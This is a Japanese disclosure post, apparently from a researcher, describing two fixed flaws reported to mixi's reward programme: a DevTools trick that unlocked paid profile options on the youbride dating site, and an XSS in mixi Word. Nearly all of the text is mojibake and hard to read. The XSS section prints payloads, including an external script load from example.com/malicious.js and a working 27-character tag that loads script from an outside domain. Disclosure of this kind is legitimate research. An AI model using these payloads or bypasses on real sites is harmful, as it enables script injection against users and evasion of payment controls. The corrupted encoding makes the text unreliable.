mixiã«å ±å‘Šã—ãŸè„†å¼±æ€§2
mixiの脆弱性報告制度(ã™ã§ã«çµ‚了ã—ã¦ã„る)ã§å ±å‘Šã—ã¦ã€ä¿®æ£ã•ã‚ŒãŸè„†å¼±æ€§ã€‚
youbrideã®æœ‰æ–™æ©Ÿèƒ½ã‚’ç„¡æ–™ã§ä½¿ãˆã‚‹å•é¡Œ
- 2014/03/12 å ±å‘Š
- 2014/03/18 ä¿®æ£å®Œäº†
- 2014/03/24 75,000円ã®AmazonギフトãŒå±Šã„ãŸ
youbrideã¯mixiã®å会社ã®æ ªå¼ä¼šç¤¾DiverseãŒé‹å–¶ã™ã‚‹å©šæ´»ã‚µã‚¤ãƒˆã€‚一時ã€åˆ¶åº¦ã®å¯¾è±¡ã ã£ãŸã€‚
youbrideã§ã¯ç„¡æ–™ãƒ¦ãƒ¼ã‚¶ãƒ¼ã¯ãƒ—ãƒãƒ•ã‚£ãƒ¼ãƒ«ã®å…¬é–‹æ¡ä»¶ã¯ã€Œå…¨ä½“ã«å…¬é–‹ã€ã—ã‹é¸ã¹ãªã„。
Chromeã®Developer Toolã§ä»–ã®é¸æŠžè‚¢ã‚’有効ã«ã—ãŸã‚‰ã€ã€Œå…¨ä½“ã«å…¬é–‹ã€ä»¥å¤–ã®å…¬é–‹æ¡ä»¶ã‚‚é¸ã¹ã¦ã—ã¾ã£ãŸã€‚
mixiワードã®XSS
- 2014/03/31 å ±å‘Š
- 2014/03/31 ä¿®æ£å®Œäº†
- 2014/04/09 125,000円ã®AmazonギフトãŒå±Šã„ãŸ
mixiワードã«XSSå¯èƒ½ãªè„†å¼±æ€§ãŒã‚ã£ãŸã€‚
「猫ã€ã«ã¯ã€ã‚ャットタワーã€ã‚ャットフードã€çŒ«ã®é‡Œè¦ªå‹Ÿé›†ã€æ¨ã¦çŒ«ã€å猫ã€ã‚¤ãƒ«ã‚«ã€ãƒšãƒ³ã‚®ãƒ³ãªã©ã®ãƒ¯ãƒ¼ãƒ‰ãŒé–¢é€£ã—ã¦ãŠã‚Šã€â€¦
ã®éƒ¨åˆ†ã€‚mixiワードã¯ã‚³ãƒŸãƒ¥ãƒ‹ãƒ†ã‚£ã‚’作æˆã—ã€é–¢é€£ãƒ¯ãƒ¼ãƒ‰ã‹ã‚‰è¿½åŠ ã§ãる。出力時ã«ã¯ä½•ã‚‚エスケープã•ã‚Œãªã„ã‘ã‚Œã©ã€æ–‡å—æ•°ãŒ30æ–‡å—以内ã€/, (, )ãªã©ãŒå…¨è§’æ–‡å—ã«å¤‰æ›ã•ã‚Œã‚‹ã¨ã„ã†åˆ¶é™ãŒã‚る。
<script>alert(0)</script>
ã¨ã„ã†ã‚ˆã†ã«ã‚¹ã‚¯ãƒªãƒ—トを埋ã‚込もã†ã¨ã—ã¦ã‚‚ã€scriptã‚¿ã‚°ãŒé–‰ã˜ã‚‰ã‚Œãªã„。後続ã®æ–‡å—ãŒã‚¹ã‚¯ãƒªãƒ—トã¨ã—ã¦èªè˜ã•ã‚Œã‚‹ã¨æ–‡æ³•çš„ã«ã‚¨ãƒ©ãƒ¼ã«ãªã£ã¦ã‚¹ã‚¯ãƒªãƒ—トãŒå‹•ã‹ãªã„。スクリプトä¸ã§()ãŒä½¿ãˆãªã„ã®ã‚‚ã¤ã‚‰ã„。
<script src="http://example.com/malicious.js">
ã¨å¤–部ã®ã‚¹ã‚¯ãƒªãƒ—トをèªã¿è¾¼ã‚‚ã†ã«ã‚‚/ãŒä½¿ãˆãªã„。
ç”ãˆ
<script src=//イマ.net>
27æ–‡å—。属性値ãªã‚‰ã°å®Ÿä½“å‚ç…§ãŒä½¿ãˆã‚‹ã€‚çŸã„ドメインをæŒã£ã¦ã„ã¦è‰¯ã‹ã£ãŸã€‚å ±å‘Šã—ãŸã¨ãã¯ã€ã‚¤ãƒž.netã®ãƒˆãƒƒãƒ—ページãŒJavaScriptã‚’è¿”ã™ã‚ˆã†ã«ã—ãŸã€‚ã¡ãªã¿ã«ã€mixiワードã¯ä¸€åº¦ä½œã£ãŸã‚‰æ¶ˆã›ãªã„らã—ã„。変ãªãƒ¯ãƒ¼ãƒ‰ã‚’作ã£ã¦ã—ã¾ã£ã¦ç”³ã—訳ãªã„。
